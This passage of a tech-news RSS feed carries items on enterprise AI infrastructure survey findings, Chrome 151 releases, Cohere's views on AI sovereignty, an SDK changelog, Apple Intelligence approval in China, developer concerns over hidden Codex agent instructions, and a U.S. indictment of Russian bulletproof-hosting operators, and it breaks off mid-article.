five-point scale, overall satisfaction averages 4.0, with ease of implementation (3.8) and value for money (3.9) trailing slightly — the softness landing, tellingly, on cost. Enterprises are spending quickly and accounting slowly.</p><h2><b>Finding 8: The next bottleneck few are watching</b></h2><p><b>As inference shifts from compute to memory, the field scatters</b></p><p>Finally, we asked how enterprises would address the emerging constraint in large-scale inference — the shift from GPU compute to memory, specifically KV-cache capacity. The responses reveal a frontier that is not yet a priority.</p><div></div><table><tbody><tr><td><p><b>31%</b></p></td><td><p><b>would rely on Dell (PowerScale / Project Lightning) — the leading single answer</b></p></td></tr><tr><td><p><b>16%</b></p></td><td><p><b>would rely on Nvidia (Dynamo / ICMSP)</b></p></td></tr><tr><td><p><b>18%</b></p></td><td><p><b>are not aware of this as a constraint (9%) or haven’t addressed inference-memory limits yet (8%)</b></p></td></tr><tr><td><p><b>10%</b></p></td><td><p><b>Hammerspace (Tier Zero); 9% DDN (Infinia); the rest split across open-source KV-cache tooling, model-level efficiency, VAST Data, and WEKA</b></p></td></tr></tbody></table><p>The memory frontier is real but barely governed. Asked which approach they would rely on as the binding constraint in inference shifts from compute to memory bandwidth, enterprises scatter: Dell leads at 31%, Nvidia follows at 16%, and the rest fragments across storage vendors, open-source tooling, and model-level efficiency techniques. Most telling is that roughly one in five (18%) either do not recognize the constraint or have not begun to address it. For a shift that will reshape inference cost and architecture, this is an early and unsettled market — and, consistent with the measurement gap in Finding 7, one where many enterprises simply do not yet have a view. It is the next chapter of the compute gap, arriving before most have closed the current one.</p><h1><b>The bottom line: A compute gap that faster spending will widen, not close</b></h1><p>Organizations with more than 100 employees are investing in AI infrastructure faster than they can measure it. Most are still early in deployment, yet their spending intentions point past their current stack — toward specialized clouds and alternative accelerators almost none of them run today — and a clear majority intend to change providers within the year. They buy on integration and total cost of ownership rather than headline price, which is rational; the difficulty is that most cannot yet see those economics clearly.</p><p>The visibility gap is concrete. The GPUs enterprises already own run at half utilization or less for the overwhelming majority, and fewer than half can rigorously track what their compute costs or returns. Satisfaction is decent but unenthusiastic, softest on value for money — the dimension hardest to judge without measurement. And the next constraint, the shift from compute to memory in large-scale inference, is arriving while most enterprises are still unaware of it. At 107 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market and earlier-stage adopters — but the direction is consistent: the appetite to spend is running well ahead of the instrumentation to spend well. The compute gap is not a capacity problem that more hardware will solve on its own; it is, first, a problem of seeing what the hardware already costs. The open question for later waves is whether enterprises build that visibility before the re-platforming arrives — or buy the next layer of infrastructure as blind to its economics as the last.</p><hr><p><i>Based on survey responses from 107 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. Because this is one wave rather than a pooled multi-month sample, the results read cross-sectionally rather than as a month-over-month trend, and at 107 respondents this is a directional signal rather than a precise measurement — the sample is self-selected, skews mid-market, and leans toward earlier-stage adopters rather than the largest hyperscale operators. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with buyer-credible purchasing authority, across Technology/Software, Healthcare/Life Sciences, Financial Services, Retail/E-commerce, and other industries.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Rolls Out Chrome 151 Beta and Early Stable Updates]]></title>
<description><![CDATA[Google released a series of Chrome 151 updates on Wednesday, July 15, 2026, covering desktop, Android, and iOS platforms, while ChromeOS devices began receiving their latest Chrome Beta update a day earlier. The latest Desktop Update introduces new Beta and Early Stable builds for Windows, Mac, a...]]></description>
<link>https://tsecurity.de/de/3672623/it-security-nachrichten/google-rolls-out-chrome-151-beta-and-early-stable-updates/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672623/it-security-nachrichten/google-rolls-out-chrome-151-beta-and-early-stable-updates/</guid>
<pubDate>Thu, 16 Jul 2026 09:24:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1101" height="614" src="https://thecyberexpress.com/wp-content/uploads/Chrome-Beta.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chrome Beta" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chrome-Beta.webp 1101w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-750x418.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta.webp 1101w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chrome-Beta-750x418.webp 750w" sizes="(max-width: 1101px) 100vw, 1101px" title="Google Rolls Out Chrome 151 Beta and Early Stable Updates 1"></p><span data-contrast="auto">Google released a series of Chrome 151 updates on Wednesday, July 15, 2026, covering desktop, Android, and iOS platforms, while ChromeOS devices began receiving their latest Chrome Beta update a day earlier. The latest Desktop Update introduces new Beta and Early Stable builds for Windows, Mac, and Linux, alongside stability and performance improvements across multiple platforms.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Chrome Beta and Desktop Update Reach Version 151.0.7922.34</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The latest <a href="https://chromereleases.googleblog.com/" target="_blank" rel="nofollow noopener">Chrome Beta Desktop Update</a> has been released for Windows, Mac and Linux, updating the Beta channel to version 151.0.7922.34. Google said a partial list of changes is available through the project's Git log. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Users interested in moving between release channels can do so through the available switching options, while any newly discovered issues can be reported by filing a bug. The company also pointed users to its community help forum for <a href="https://thecyberexpress.com/wp-maps-pro-vulnerability/" target="_blank" rel="noopener">troubleshooting</a> and discussions about common issues.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Google also introduced an Early Stable Desktop Update, rolling out Chrome 151 versions 151.0.7922.34 and 151.0.7922.35 to a small percentage of Windows and Mac users. According to the company, a complete list of changes for the build is available in the release log, with additional information provided for its Early Stable rollout process.</span>
<h3 aria-level="2"><b><span data-contrast="none">Chrome 151 Expands Across Android and iOS</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">On Android, Chrome 151 (151.0.7922.29) entered an Early Stable rollout for a limited number of users and is expected to reach more devices through Google Play over the following days. Google stated that the release focuses on <a href="https://thecyberexpress.com/wp-maps-pro-vulnerability/" target="_blank" rel="noopener">stability and performance</a> improvements, with complete technical changes documented in the Git log.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The Chrome Beta release for Android, also carrying version 151.0.7922.29, is already available through Google Play. Google said users can review a partial list of changes in the Git log, while information about new features is available on the Chromium blog alongside updates covering the web platform.</span>

<span data-contrast="auto">For iPhone and iPad users, Chrome Stable 151 (151.0.7922.25) is scheduled to appear on the App Store within hours of the <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28999">announcement</a>. Similar to the <a href="https://thecyberexpress.com/overlayphantom-android-banking-trojan/" target="_blank" rel="noopener">Android</a> release, the update delivers stability and performance improvements. Meanwhile, Chrome Beta 151 (151.0.7922.26) for iOS is expected to reach the App Store over the next few days, with Google publishing a partial change log for the release.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">ChromeOS Beta Update Also Released</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Ahead of the broader Chrome 151 announcements, Google began rolling out a Chrome Beta update for ChromeOS and ChromeOS Flex on Tuesday, July 14, 2026. The Beta channel is being upgraded to OS version 16733.19.0, paired with browser version 151.0.7922.23, for most supported ChromeOS devices.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Google encouraged users across all releases to report newly identified bugs through its official reporting system, submit feedback directly through Chrome, or seek assistance via its ChromeOS and Chromebook community forums. The company also reminded users that instructions for switching release channels remain available for those interested in testing future Chrome Beta and Desktop Update builds.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cohere VP says enterprise AI sovereignty requires control of the full agent stack at VB Transform 2026]]></title>
<description><![CDATA[Hundreds of enterprise leaders and technical experts packed the main ballroom of the luxurious Hotel Nia in Menlo Park this week for VB Transform 2026, the year's preeminent conference on using generative AI agents to drive business outcomes. Rachad Alao, vice president of product engineering at ...]]></description>
<link>https://tsecurity.de/de/3671771/it-nachrichten/cohere-vp-says-enterprise-ai-sovereignty-requires-control-of-the-full-agent-stack-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671771/it-nachrichten/cohere-vp-says-enterprise-ai-sovereignty-requires-control-of-the-full-agent-stack-at-vb-transform-2026/</guid>
<pubDate>Wed, 15 Jul 2026 22:02:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hundreds of enterprise leaders and technical experts packed the main ballroom of the luxurious Hotel Nia in Menlo Park this week for<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a>, the year's preeminent conference on using generative AI agents to drive business outcomes. </p><p>Rachad Alao, vice president of product engineering at the rising Canadian enterprise AI startup Cohere, joined VentureBeat CEO and editor-in-chief <a href="https://venturebeat.com/author/matt-marshall">Matt Marshall</a> for a fireside chat about building agentic systems without surrendering sensitive data, infrastructure control, or the ability to change vendors.</p><p>Alao, who previously led responsible AI and trust and safety engineering teams at Google and Meta, argued that AI sovereignty means more than downloading an open model or running an application behind a corporate firewall.</p><p>Asked how Cohere defines sovereignty, Alao pointed to organizations operating mission-critical systems, including banks, hospitals and governments.</p><p>“It is important to have very tight control on where the data resides, have tight control on the AI,” he said, adding that AI operations should take place in jurisdictions an organization understands or directly controls.</p><p>That extends from GPUs and private-cloud infrastructure through governance systems that route requests among models, as well as the connectors, search tools and agent frameworks acting on enterprise data.</p><p>“You want to have control on the entire stack,” Alao said.</p><h2><b>Agent workloads could outrun falling token prices</b></h2><p>Marshall challenged one of the central economic arguments for smaller, locally deployed models: Inference prices continue to fall rapidly, potentially weakening the case for optimizing every token.</p><p>Alao countered that total consumption is climbing even faster as enterprises move from relatively simple chatbots to agents that reason through problems, call tools, search internal systems and take multiple steps before returning an answer.</p><p>“Your token utilization is going exponentially up, because you’re dealing with more and more complex agentic use cases,” he said. Those workflows require “a lot of processing, thinking, tools interaction” to complete their objectives, he added.</p><p>Alao also drew a contrast between providers that bill customers according to token consumption and Cohere’s approach.</p><p>“If your whole way of charging customers is for token utilization, you want to maximize token utilization,” he said. “We do not sell our models and our platform that way.”</p><p>Instead, Alao said Cohere tries to help enterprises solve their hardest problems privately and securely while reducing unnecessary model usage. His prescription was straightforward: “Use the right model for the task at hand.”</p><p>Rather than sending every request to the largest available frontier model, enterprises should route work according to the intelligence required and the sensitivity or regulatory burden attached to the task.</p><p>Alao cited an unnamed Canadian bank that uses Cohere’s on-premises models for highly regulated workloads, while sending less sensitive tasks requiring greater intelligence through Cohere’s North platform to larger frontier models.</p><p>“So model routing can become super useful,” he said.</p><h2><b>Smaller models for most enterprise work</b></h2><p>Asked by an audience member how Cohere’s open-source <a href="https://venturebeat.com/technology/cohere-open-sources-a-coding-agent-that-runs-on-a-single-h100">North Mini Code</a>, released last month, could compete against proprietary coding models, Alao acknowledged that larger frontier models may perform somewhat better on the hardest tasks.</p><p>But that advantage may not justify using them indiscriminately.</p><p>“For 80% of the use cases that they needed, this was a lot more effective, a lot cheaper,” Alao said of developers adopting the model.</p><p>Cohere’s North Mini Code runs on a single Nvidia H100 GPU and targets agentic software engineering, including terminal work, code review and tool use.</p><p>The company has also released <a href="https://venturebeat.com/technology/cohere-cracks-lossless-quantization-and-native-citations-with-first-full-apache-2-0-licensed-open-model-command-a/">Command A+</a>, a 218-billion-parameter mixture-of-experts model with only 25 billion parameters active during each generation step. </p><p>Its compressed four-bit version reduces the hardware required for private deployment, while its Apache 2.0 license gives enterprises broad freedom to operate and modify it.</p><h2><b>Search becomes part of the agent</b></h2><p>Asked about Cohere’s longstanding work on embeddings and enterprise search, Alao said the field is moving beyond retrieving text and inserting it into a model’s context window.</p><p>“Today, the state of the art is around multimodal search,” he said. “It’s beyond just the text modality.”</p><p>Search across documents, images and other forms of information is becoming “an integral component of your agentic workflow,” Alao added, with the model deciding when and how to use retrieval like any other tool.</p><p>Asked what would persuade enterprises to move beyond bundled AI services from existing cloud providers, Alao returned to data control and portability.</p><p>“If you’re interested in sovereignty, you want to have more control on your data,” he said. Cohere’s governance layer, he added, lets customers route traffic to appropriate models, “breaking that vendor lock-in concern that a lot of our customers have.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SDK v0.0.61]]></title>
<description><![CDATA[Context compaction now reports progress status while it runs
Workspace git info (branch/remote) is now persisted and refreshed across sessions
Fixed benign git states being reported as workspace initialization errors
Plan/Act mode guidance added to the system prompt, with nudges when switching mo...]]></description>
<link>https://tsecurity.de/de/3671583/downloads/sdk-v0061/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671583/downloads/sdk-v0061/</guid>
<pubDate>Wed, 15 Jul 2026 20:16:38 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Context compaction now reports progress status while it runs</li>
<li>Workspace git info (branch/remote) is now persisted and refreshed across sessions</li>
<li>Fixed benign git states being reported as workspace initialization errors</li>
<li>Plan/Act mode guidance added to the system prompt, with nudges when switching modes</li>
<li>Editor diff view restored for SDK edit tools</li>
<li>Model IDs are now suggested from OpenAI-compatible endpoints</li>
<li>VS Code terminal reliability improvements (OSC 633 parsing, exit codes, timeout handling)</li>
<li>Provider-specific request headers are now centralized in the LLM layer</li>
<li>Telemetry now attaches organization context when identifying with cached credentials</li>
<li>Added a shared <code>@cline/ui</code> theme package</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/sdk/sdk/v0.0.60...sdk/sdk/v0.0.61"><tt>sdk/sdk/v0.0.60...sdk/sdk/v0.0.61</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Intelligence China: Regulatory Approval Clears The Path]]></title>
<description><![CDATA[Apple Intelligence China is finally moving forward after receiving a major green light from the local cyberspace regulator. The agency officially registered the service on Wednesday, clearing a massive legal hurdle for bringing every new Apple Intelligence feature arriving on your devices to user...]]></description>
<link>https://tsecurity.de/de/3671313/ios-mac-os/apple-intelligence-china-regulatory-approval-clears-the-path/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671313/ios-mac-os/apple-intelligence-china-regulatory-approval-clears-the-path/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Intelligence China is finally moving forward after receiving a major green light from the local cyberspace regulator. The agency officially registered the service on Wednesday, clearing a massive legal hurdle for bringing every new Apple Intelligence feature arriving on your devices to users across the region.



While this step does not give us a firm launch date, it serves as a huge turning point for Apple in a highly competitive market where smartphone buyers constantly look for fresh software updates.



Alibaba and Baidu step in to power local features



To make this happen, the company is relying on local partnerships to safely navigate the strict rules surrounding artificial intelligence. Alibaba officially confirmed that its Qwen model will run directly inside the system, handling text and image understanding along with content generation.



Instead of switching between different apps, people will be able to use these tools natively across iOS, iPadOS, macOS, and visionOS. This creates a much smoother daily routine for anyone holding an iPhone or working on a Mac.



Additionally, Baidu is helping the hardware maker develop other specific functions to ensure the software meets regional demands. By leaning on these local players, the company avoids the massive roadblock of bringing outside models into a heavily regulated internet space, keeping its core ecosystem intact.



The paperwork is done but users still have to wait



Getting the official registration from the internet regulator is a huge win, but a completed filing simply means permission to proceed. It does not mean a public rollout is happening tomorrow.



The regulator did not provide a specific timeline for when Apple Intelligence will actually go live for the public. The company still needs to figure out how exactly it will blend its own system tools with Chinese content rules and local server requirements before hitting the launch button.



This approval comes at a very good time, as the brand recently saw a 24.4 percent jump in its regional device shipments during the second quarter. Adding fresh AI tools could help keep that momentum going against tough domestic rivals like Huawei.



As the regulatory dust settles, all eyes are on how smoothly the company can launch this tailored experience without compromising the familiar feel of its software.]]></content:encoded>
</item>
<item>
<title><![CDATA[Codex Multi-Agent V2 update raises developer concerns over agent transparency]]></title>
<description><![CDATA[OpenAI’s recent update to its Codex CLI has introduced a new protocol that appears to shift more orchestration decisions from user-defined configuration to the runtime, prompting developers to request greater visibility into the instructions exchanged between AI agents.



In a detailed GitHub me...]]></description>
<link>https://tsecurity.de/de/3671150/ai-nachrichten/codex-multi-agent-v2-update-raises-developer-concerns-over-agent-transparency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671150/ai-nachrichten/codex-multi-agent-v2-update-raises-developer-concerns-over-agent-transparency/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI’s recent update to its Codex CLI has introduced a new protocol that appears to shift more orchestration decisions from user-defined configuration to the runtime, prompting developers to request greater visibility into the instructions exchanged between AI agents.</p>



<p class="wp-block-paragraph">In a detailed GitHub <a href="https://github.com/openai/codex/pull/26210" target="_blank" rel="noreferrer noopener">merged request</a>, users stated that the Multi-Agent V2 protocol-infused architecture of the CLI no longer exposes the instructions passed between parent and sub-agents, making it difficult to inspect how work is delegated across the system.</p>



<p class="wp-block-paragraph">“Multi-agent v2 currently routes agent instructions through normal tool arguments and inter-agent context. That means the parent model can emit plaintext task text, Codex can persist it in history/rollouts, and the recipient can receive it as ordinary assistant-message <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON</a>,” the request read.</p>



<p class="wp-block-paragraph">“This changes the v2 path so agent instructions stay encrypted between model calls: Responses encrypts the message argument returned by the model, Codex forwards only that ciphertext, and Responses decrypts it internally for the recipient model,” it added.</p>



<p class="wp-block-paragraph">Other users, commenting on the thread, also said that the lack of visibility into agent instructions can be attributed to the recently introduced Multi-Agent V2 protocol, with one user stating that reverting to the previous version of the CLI restored visibility, but only as a temporary workaround.</p>



<p class="wp-block-paragraph">Separately, <a href="https://www.linkedin.com/in/ignatremizov/" target="_blank" rel="noreferrer noopener">Ignat Remizov</a>, CTO at payment service Zolvat, <a href="https://github.com/ignatremizov" target="_blank" rel="noreferrer noopener">filed</a> a GitHub <a href="https://github.com/openai/codex/issues/28058" target="_blank" rel="noreferrer noopener">feature request</a> to offer what can be described as a permanent fix after stating that OpenAI may have introduced the change in efforts to harden security.</p>



<p class="wp-block-paragraph">“A possible shape is to keep the encrypted message field for model delivery, but add a separate non-encrypted audit field for the readable task text. The audit field should be persisted in rollout/history/trace metadata so users and maintainers can inspect what was delegated without needing to decrypt model-delivery ciphertext,” Zolvat wrote.</p>



<h2 class="wp-block-heading">Enterprise governance concerns are likely to emerge</h2>



<p class="wp-block-paragraph">While an <a href="https://github.com/openai/codex/issues/26753#issuecomment-4637873271" target="_blank" rel="noreferrer noopener">OpenAI contributor said</a> the protocol remains under development and declined further changes to the request, analysts warned that the issue would create debugging, governance, and operational challenges for development teams and their enterprises if the issue persists or becomes a long-term characteristic of multi-agent systems.</p>



<p class="wp-block-paragraph">“Hidden agent instructions reduce observability in multi-agent systems. Developers can no longer see whether failures stemmed from incorrect task delegation, poor orchestration, or model reasoning, making debugging, prompt optimization, and root-cause analysis significantly harder. Agent instruction traces are becoming as essential as application logs in modern software,” said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p class="wp-block-paragraph">For CIOs, Jain pointed out, opaque agent interactions create governance challenges.</p>



<p class="wp-block-paragraph">“Without visibility into how agents delegated and executed tasks, it becomes harder to audit decisions, investigate incidents, demonstrate compliance, and build trust in AI systems. Enterprises will increasingly expect secure but auditable agent communication rather than completely hidden orchestration,” Jain said.</p>



<p class="wp-block-paragraph">“Any big enterprise, especially in regulated industries such as banks and hospitals, needs to be able to prove what their AI systems did and why, especially if something goes wrong. If a sub-agent does something bad, like touching private data, the company needs to show here’s exactly what it was told to do. If that record doesn’t exist, it is a serious problem for trust and legal accountability, not just an annoyance,” Jain added.</p>



<p class="wp-block-paragraph">Further, the analyst pointed out that issues around the visibility of agent operations could even slow production deployments of mission-critical AI.</p>



<p class="wp-block-paragraph">“Enterprises, just like we are seeing with developers on GitHub, are likely to demand stronger observability, audit trails, and governance before trusting autonomous multi-agent systems. It is nearly as important as model performance,” Jain added.</p>



<p class="wp-block-paragraph">An email sent to OpenAI enquiring about planned changes to the protocol went unanswered.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Infrastructure Cyber Risk: Why Business Resilience Now Depends on Everyone Else’s Security]]></title>
<description><![CDATA[Critical Infrastructure Cyber Risk Has Become a Board-Level Business Issue 
Critical infrastructure used to sound like someone else’s problem. Power grids, water systems, telecoms, hospitals, ports, rail networks, cloud platforms, payment rails, public services: important, obviously, but safely f...]]></description>
<link>https://tsecurity.de/de/3670743/it-security-nachrichten/critical-infrastructure-cyber-risk-why-business-resilience-now-depends-on-everyone-elses-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670743/it-security-nachrichten/critical-infrastructure-cyber-risk-why-business-resilience-now-depends-on-everyone-elses-security/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://cybermaniacs.com/cm-blog/critical-infrastructure-cyber-risk-why-business-resilience-now-depends-on-everyone-elses-security" title="" class="hs-featured-image-link"> <img src="https://cybermaniacs.com/hubfs/Blog%20Header%20Graphics/G2M-1386%20Is%20Nothing%20Sacred%20Nesspresso%20Hacked.png" alt="Critical Infrastructure Cyber Risk: Why Business Resilience Now Depends on Everyone Else’s Security" class="hs-featured-image"> </a> 
</div> 
<h2><strong><span>Critical Infrastructure Cyber Risk Has Become a Board-Level Business Issue</span></strong></h2> 
<p><span>Critical infrastructure used to sound like someone else’s problem. Power grids, water systems, telecoms, hospitals, ports, rail networks, cloud platforms, payment rails, public services: important, obviously, but safely filed under “government,” “operators,” or “people who wear hard hats and know what SCADA means.”</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure]]></title>
<description><![CDATA[Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled ransomware, malware, phishing, and other cybercriminal activities, resulting in more than $62 million in losses to victims acros...]]></description>
<link>https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669596/it-security-nachrichten/three-russians-indicted-in-62m-cybercrime-scheme-targeting-us-infrastructure/</guid>
<pubDate>Wed, 15 Jul 2026 07:06:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Three Russian cybercrime indictment" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Three-Russian-cybercrime-indictment-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Three Russians Indicted in $62M Cybercrime Scheme Targeting U.S. Infrastructure 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="443" data-end="800">Three Russian nationals have been charged in a sweeping Russian cybercrime indictment tied to an alleged bulletproof hosting operation that U.S. authorities say enabled <a href="https://thecyberexpress.com/ransomware-sanctions-target-vpn/" target="_blank" rel="noopener">ransomware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-avrecon-malware/" target="_blank" rel="noopener">malware</a>, <a href="https://thecyberexpress.com/fbi-warns-of-malicious-traffic/" target="_blank" rel="noopener">phishing</a>, and other cybercriminal activities, resulting in more than $62 million in losses to victims across the United States and several other countries.</p>
<p data-start="802" data-end="1133">The U.S. Attorney's Office for the Northern District of Ohio announced the unsealing of the indictment following a seven-year investigation. Alongside the criminal charges, the U.S. Department of State is offering a <a href="https://rewardsforjustice.net/rewards/media-land/" target="_blank" rel="nofollow noopener">reward of up to $10 million </a>for information on foreign government-linked associates connected to the operation.</p>

<h3 data-section-id="1cu3nlp" data-start="1135" data-end="1188"><strong>Three Russian Nationals and Two Companies Indicted</strong></h3>
<p data-start="1190" data-end="1260">A federal grand jury returned the indictment in December 2024 against:</p>

<ul data-start="1262" data-end="1481">
 	<li data-section-id="11gkvxj" data-start="1262" data-end="1328">Alexander Alexandrovich Volosovik, 43, of St. Petersburg, Russia</li>
 	<li data-section-id="1lbppu8" data-start="1329" data-end="1389">Kirill Andreevich Zatolokin, 34, of St. Petersburg, Russia</li>
 	<li data-section-id="1myt66t" data-start="1390" data-end="1449">Yulia Vladimirovna Pankova, 29, of St. Petersburg, Russia</li>
 	<li data-section-id="byn7yg" data-start="1450" data-end="1466">Media Land LLC</li>
 	<li data-section-id="qi6id" data-start="1467" data-end="1481">ML.Cloud LLC</li>
</ul>
<p data-start="1483" data-end="1624">The defendants face charges including conspiracy to commit computer <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28967">fraud</a>, wire fraud, money laundering, and aiding cybercriminal activities.</p>
<p data-start="1483" data-end="1624"><img class="aligncenter wp-image-113102 size-full" src="https://thecyberexpress.com/wp-content/uploads/Russian-cybercrime-indictment-e1784090682124.webp" alt="Russian cybercrime indictment" width="600" height="410"></p>
<p data-start="1626" data-end="1832">Assistant Attorney <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28964">General</a> A. Tysen Duva <a href="https://www.justice.gov/usao-ndoh/pr/three-russian-nationals-indicted-international-cybercrimes-resulting-more-62m-losses" target="_blank" rel="nofollow noopener">said</a> the defendants allegedly operated criminal infrastructure from overseas that supported attacks against U.S. critical institutions and placed the public at risk.</p>

<h3 data-section-id="coypn0" data-start="1834" data-end="1900"><strong><span role="text">Bulletproof Hosting Allegedly Enabled Cybercrime Operations</span></strong></h3>
